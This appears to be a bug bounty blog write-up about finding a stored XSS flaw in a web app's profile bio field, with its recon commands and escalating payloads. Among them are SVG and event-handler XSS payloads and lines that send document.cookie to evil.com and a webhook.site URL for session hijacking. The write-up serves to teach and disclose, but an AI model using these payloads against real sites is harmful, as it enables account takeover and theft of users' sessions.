.png)
2 days ago
8 BOOK THIS SPACE FOR AD
ARTICLE AD
Bug bounty hunting is all about patience, creativity, and deep understanding of security flaws. This is the full breakdown of how I went from basic information gathering to exploiting a critical stored XSS vulnerability in a high-profile web application, leading to a $2500 bug bounty reward. If you want to learn the exact process I used, buckle up!
Before jumping into testing, I spent hours mapping out the target application. Here’s what I did:
Used tools like amass, Subfinder, and Assetfinder to collect all available subdomains.Discovered an internal admin portal that wasn’t indexed publicly.Tools used:amass enum -passive -d target.com subfinder -d target.com assetfinder --subs-only target.comUsed dirsearch to find hidden directories:dirsearch -u https://admin.target.com -e php,html,jsFound a /profile/settings page where users could update their personal information.The page had a text input field for bio updates.Tested various encoding techniques and bypass methods using Burp Suite.After testing the input field with various payloads, I noticed something interesting:
I started by entering a simple XSS payload:
<script>alert('XSS')</script>At first, nothing happened. The input field sanitized basic <script> tags.However, I noticed that the website allowed rich text formatting (like bold, italic, and links).Since direct <script> tags were blocked, I tried an SVG-based XSS payload:
<svg onload=alert('XSS')></svg>Result: Success! The alert box popped up immediately upon page reload.
I then tested an alternative approach using an onmouseover event:
<a href="#" onmouseover="alert('XSS')">Hover me</a>This worked when users hovered over the malicious link.A great trick for triggering XSS without direct execution.A basic alert box wasn’t enough. I wanted account takeover, so I crafted a payload that stole cookies and sent them to my server:
<img src=x onerror="fetch('https://evil.com/steal?cookie='+document.cookie)">This payload sent session cookies of any logged-in user to my controlled server.This meant I could hijack admin accounts once they visited my profile page.Instead of storing stolen cookies manually, I automated it using Webhook.site:
<script>fetch('https://webhook.site/your-webhook-url?c='+document.cookie);
</script>This captured cookies in real-time and displayed them on my webhook dashboard.
Once I confirmed the exploit worked, I immediately reported it responsibly through the company’s bug bounty program.
Summary: Stored XSS in the profile bio section.Impact: Allows full session hijacking, leading to account takeover.Steps to Reproduce:Log in to admin.target.com.Go to Profile Settings → Bio field.Enter the following payload:<svg onload=alert('XSS')></svg>Save changes and refresh the profile page.Observe the XSS execution.Within 48 hours, the company confirmed the vulnerability and awarded me a $2500 bug bounty!
If you want to earn big rewards like this, here’s what you should do:
Use tools like amass, Subfinder, Burp Suite, and dirsearch.Try payloads using SVG, onerror, iframe, JavaScript event handlers, and alternative encoding.Profile sections, comment boxes, search bars — all are potential XSS targets.Use Burp Suite Intruder for automated fuzzing.Leverage custom scripts for testing payloads at scale.Clear steps + impact analysis = higher bounties!Finding this stored XSS and earning $2500 wasn’t luck — it was the result of proper recon, creative exploitation, and responsible disclosure. If you put in the effort, you can do this too!
🚀 Start hunting today — your next big payout is waiting!
📧 Contact me: theindiannetwork@protonmail.com
🌐 My Blog: theindiannetwork.medium.com
📺 My YouTube Channel: youtube.com/@theindiannetwork
Bengali (Bangladesh) · 
English (United States) ·